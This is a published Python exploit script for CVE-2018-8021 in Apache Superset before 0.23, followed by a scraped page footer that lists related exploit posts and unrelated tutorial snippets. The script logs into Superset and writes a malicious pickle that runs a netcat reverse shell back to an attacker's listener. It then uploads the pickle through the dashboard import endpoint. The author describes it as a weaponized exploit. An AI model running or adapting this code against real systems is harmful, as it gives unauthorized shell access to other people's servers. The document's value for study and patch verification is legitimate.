# Exploit Title: Apache Superset < 0.23 - Remote Code Execution

# Date: 2018-05-17

# Exploit Author: David May (david.may@semanticbits.com)

# Vendor Homepage: https://superset.apache.org/

# Software Link: https://github.com/apache/incubator-superset

# Version: Any before 0.23

# Tested on: Ubuntu 18.04

# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been

# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python

import sys

import os

from lxml import html

import requests

# Change these values to your TCP listener

myIP = '192.168.137.129'

myPort = ''

# Credentials must belong to user with 'can Import Dashboards on Superset' privilege

username = 'test'

password = 'test'

# Logic in case script arguments are not given

if len(sys.argv) < 3:

    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')

    print('Script Usage:')

    print('./supersetrce.py <superset server ip> <superset port>')

    sys.exit()

else:

    # Script arguments

    supersetIP = sys.argv[1]

    supersetPort = sys.argv[2]

    # Verify these URLs match your environment

    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'

    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

    # Checks to see if file that we are going to write already exists in case this is run more than once

    if os.path.isfile('evil.pickle'):

        os.remove('evil.pickle')

    # Headers that we append to our POST requests

    headers_dict = {

        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',

        'DNT': '',

        'Connection': 'close',

        'Upgrade-Insecure-Requests': '',

    }

    # Creates evil pickle file and writes the reverse shell to it

    evilPickle = open('evil.pickle','w+')

    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

    evilPickle.close()

    # Start a session so we have persistent cookies

    session = requests.session()    

    # Grabs the Login page to parse it for its CSRF token

    login_page = session.get(login_URL)

    if login_page.status_code != 200:

        print('Login page not reached, verify URLs in script')

    login_tree = html.fromstring(login_page.content)

    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

    # Form data that is sent in the POST request to Login page

    login_data = {

        'csrf_token' : csrf_token,

        'username' : username,

        'password' : password,

    }

    # Adds the Referer header for the login page

    headers_dict['Referer'] = login_URL

    # Logon action

    login = session.post(login_URL, headers=headers_dict, data=login_data)    

    # Grabs the Upload page to parse it for its CSRF token

    upload_page = session.get(upload_URL)

    if upload_page.status_code != 200:

        print('Upload page not reached, verify credentials and URLs in script')

    upload_tree = html.fromstring(upload_page.content)

    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

    # Adds the Referer header for the Upload page

    headers_dict['Referer'] = upload_URL

    # Upload action

    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})

    # Closes the session

    session.close()

    sys.exit()

[EXP]Apache Superset < 0.23 - Remote Code Execution的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  3. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  4. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  7. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  8. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  9. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

随机推荐

  1. 【测试工具】Macaca 自动遍历器 NoSmoke

    Macaca 提供的基础能力上研发出了一套多端深度遍历爬虫工具. 希望可以最大化减少UI 测试脚本的编写涵盖以下功能点: 支持iOS, Android,PC-Web 三个平台的自动化测试 同时可以通过 ...

  2. 100-days: fifteen

    Title: Disney(迪士尼) moves from behemoth to colossus with closing(使…结束,使停止) of Fox(福克斯) deal(商业上的交易/协议 ...

  3. eclipse中集成python开发环境

    转载:https://www.cnblogs.com/mywood/p/7272487.html Eclipse简介 Eclipse是java开发最常用的IDE,功能强大,可以在MAC和Windos上 ...

  4. MySQL表与表之间的关系详解

    外键 说到表与表之间的关系就不得不说到一个关键词:外键 MySQ中的外键是什么,和表与表之间有什么关联? 外键(foreign key)又叫外连接, 在数据库中发挥着重要的作用 尤其是对于表和表之间的 ...

  5. Java SSM 框架相关基础面试题

    一.Spring 面试题 1. Spring 在 SSM 中起什么作用? Spring 是轻量级框架,作用是作为 Bean 工厂,用来管理 Bean 的声明周期和框架集成. Spring 的两大核心: ...

  6. ABP Xunit单元测试 第五篇

    1.创建如下的项目结构 public class TestName { public bool ValidateName(string Name) { if (Name == "yin&qu ...

  7. 75.iOS内存管理

    堆区和栈区 1.栈区:由编译器自动分配释放,函数的参数值,局部变量等值 2.堆区:一般由开发人员分配释放,若不释放,则可能会引起内存泄漏 NSString *string = @"abcd& ...

  8. ios Block详解

    一. iOS代码块Block 1.1 概述 代码块Block是苹果在iOS4开始引入的对C语言的扩展,用来实现匿名函数的特性,Block是一种特殊的数据类型,其可以正常定义变量.作为参数.作为返回值, ...

  9. Linux 第十天

    十三.权限管理 1.ACL权限开启 1)dumpe2fs -h /dev/sda3查看分区ACL权限是否开启 -h:仅显示超级块中信息,而不显示磁盘块组的详细信息 2)mount -o remount ...

  10. TortoiseSVN与TortoiseGit

    TortoiseSVN与TortoiseGit 功能:版本控制+备份处理 差异:SVN二段式,没有中间存储点,直接提交后到达了远程存储点:要想对本地的修改进行记录,必须要与SVN服务器进行通讯,无法只 ...